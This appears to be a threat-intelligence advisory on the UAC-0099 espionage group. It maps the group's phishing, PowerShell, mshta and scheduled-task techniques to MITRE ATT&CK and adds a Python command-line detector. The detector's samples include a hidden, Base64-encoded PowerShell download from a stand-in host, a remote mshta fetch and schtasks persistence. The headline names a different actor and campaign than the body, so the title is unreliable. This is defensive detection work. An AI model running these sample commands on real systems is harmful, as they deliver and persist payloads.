UAC-0125 Attack Detection: Hackers Use Fake Websites on Cloudflare Workers to Exploit the “Army+” Application

Summary:
UAC-0099, a cyber-espionage threat actor linked to advanced persistent threats (APTs), has been identified targeting organizations with sophisticated campaigns. According to a recent analysis by SOC Prime, UAC-0099 employs a combination of spear-phishing emails, malicious attachments, and advanced malware to infiltrate targeted networks. The group focuses on gathering intelligence from government, military, and critical infrastructure sectors.

The attacks are characterized by their use of custom malware and well-crafted social engineering tactics. The malware is designed to persist in the victim’s system while exfiltrating sensitive data. UAC-0099’s campaigns highlight their ability to adapt their techniques, targeting vulnerabilities in both IT and OT environments to achieve their espionage objectives.

Security Officer Comments:
The ongoing campaigns by UAC-0099 demonstrate the growing sophistication of cyber-espionage groups and their ability to craft targeted attacks that exploit both human and technical vulnerabilities. The group’s focus on critical infrastructure and government sectors is particularly concerning, as breaches in these areas could have far-reaching consequences, including disruptions to national security.

Organizations must remain vigilant by adopting proactive defense strategies. This includes training employees to recognize phishing attempts, deploying advanced detection tools, and ensuring that security measures are tailored to defend against both traditional and emerging threats. The detection strategies highlighted by SOC Prime provide valuable insights into identifying and mitigating UAC-0099’s activity.

MITRE ATT&CK:
Initial Access:

  • Phishing: Spearphishing Attachment (T1566.001): Involves the use of email attachments to deliver malicious payloads.
  • Execution from ZIP Archive [7zip]: Executed via process creation.
  • Execution from RAR Archive [WinRAR]: Executed via process creation.

Execution:

  • Scheduled Task/Job (T1053): Using scheduled tasks for execution.
    • Schtasks points to suspicious directories, binaries, or scripts (via cmdline).
  • Exploitation for Client Execution (T1203): Using client-side exploitation methods.
  • User Execution: Malicious Link (T1204.001): Includes possible malicious LNK files with double extensions (via cmdline).
  • User Execution: Malicious File (T1204.002): Malicious file execution methods from ZIP archives [7zip] or RAR archives [WinRAR] (via process creation).
  • Command and Scripting Interpreter: PowerShell (T1059.001):
    • PowerShell commands used for downloading or uploading files (via cmdline).
    • Hidden PowerShell command lines for execution.
    • Suspicious usage of Invoke-RestMethod (via PowerShell).
    • .NET classes/methods called from PowerShell command lines (via process creation).
    • Detection of Base64-encoded malicious content (via cmdline).
    • Strings indicative of suspicious PowerShell activity (via cmdline or PowerShell).
  • Command and Scripting Interpreter: Windows Command Shell (T1059.003):
    • Usage of environment variables in command line arguments.
    • Suspicious PowerShell strings (via cmdline).

Defense Evasion:

  • Obfuscated Files or Information (T1027):
    • Indicators of Base64-encoded malicious content (via cmdline).
    • Potential PowerShell obfuscation tactics.
  • Command Obfuscation (T1027.010): Indicators of obfuscation in PowerShell commands (via cmdline).
  • System Binary Proxy Execution (T1218):
    • Detection of suspicious LOLBAS (Living Off the Land Binaries and Scripts) MSHTA commands for defense evasion (via process creation).
  • Hide Artifacts (T1564):
    • Presence of suspicious files or execution from public user profiles (via file_event or process creation).
  • Hidden Window (T1564.003): Indicators of hidden PowerShell command lines used for execution (via cmdline).

Command and Control:

  • Ingress Tool Transfer (T1105): Transferring files using PowerShell download/upload methods (via cmdline).

Exfiltration:

  • Automated Exfiltration (T1020): Uploading files via PowerShell methods or suspicious use of Invoke-RestMethod (via cmdline or PowerShell).
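The items above read as a checklist of command-line heuristics. The following added example (not code from SOC Prime or from the advisory) shows how such heuristics can be run over process-creation command lines, including decoding a PowerShell -EncodedCommand payload before matching, so a download cradle hidden inside Base64 is still caught. The rule set and the sample command lines are constructed for illustration and are not indicators from the page.

```python
import base64
import re
# Heuristics for the PowerShell / LOLBAS behaviours listed in the ATT&CK section
# (hypothetical rule set). Each regex runs over the raw command line plus any
# -EncodedCommand payload after it has been decoded from UTF-16LE Base64.
RULES = [
    ("T1564.003 hidden PowerShell window",
     re.compile(r"(?i)\s-(?:w|win|window|windowstyle)\s+hidden\b")),
    ("T1027 Base64-encoded command",
     re.compile(r"(?i)\s-(?:e|ec|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}")),
    ("T1105/T1020 PowerShell download or upload",
     re.compile(r"(?i)Invoke-RestMethod|Invoke-WebRequest|Net\.WebClient|"
                r"Download(?:File|String)|UploadFile|\b(?:irm|iwr)\b")),
    ("T1218 LOLBAS mshta", re.compile(r"(?i)\bmshta(?:\.exe)?\b")),
    ("T1053 schtasks pointing to a suspicious directory",
     re.compile(r'(?i)schtasks.*/tr\s+"?[^"]*\\(?:Users\\Public|Temp|AppData)\\')),
    ("T1204.001 LNK with double extension",
     re.compile(r"(?i)\.(?:pdf|docx?|xlsx?|jpe?g|png|txt)\.lnk\b")),
    ("T1564 execution from public user profile",
     re.compile(r"(?i)\\Users\\Public\\[^\s\"]*\.(?:exe|vbs|js|bat|ps1|hta|lnk)\b")),
]
ENCODED_ARG = re.compile(r"(?i)\s-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or '' if absent or undecodable."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return ""

def analyze(cmdline):
    """Sorted labels of the rules matched by one process-creation command line."""
    text = cmdline + "\n" + decode_encoded_command(cmdline)
    return sorted(label for label, rx in RULES if rx.search(text))

# Constructed sample command lines (not advisory indicators); the encoded one is built the way 'powershell -EncodedCommand' expects.
ENCODED_SCRIPT = base64.b64encode(
    r"Invoke-RestMethod -Uri http://example.invalid/p -OutFile $env:TEMP\p.vbs".encode("utf-16le")
).decode("ascii")
SAMPLES = {
    "lnk": r'cmd.exe /c start "" "C:\Users\Public\report.pdf.lnk"',
    "enc": "powershell.exe -NoP -W Hidden -EncodedCommand " + ENCODED_SCRIPT,
    "task": r'schtasks /create /tn Updater /tr "C:\Users\Public\Libraries\svc.vbs" /sc minute /mo 5',
    "mshta": "mshta.exe http://example.invalid/p.hta",
    "benign": r"notepad.exe C:\Users\alice\notes.txt",
}
```

Calling `analyze(cmd)` for each entry in `SAMPLES` returns the matched technique labels; the benign entry returns an empty list, and the encoded entry is flagged for the hidden window, the Base64 argument and the download cradle that only appears after decoding.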

Suggested Corrections:
Organizations should prioritize enhancing email security by deploying advanced filtering solutions to block spear-phishing attempts and malicious attachments. Regular employee awareness training is essential to help staff recognize phishing tactics and suspicious content. Organizations should also implement advanced threat detection tools to monitor for anomalies and indicators of compromise (IoCs) linked to UAC-0099.

Link(s):
https://socprime.com/blog/uac-0099-cyber-espionage-attacks-detection/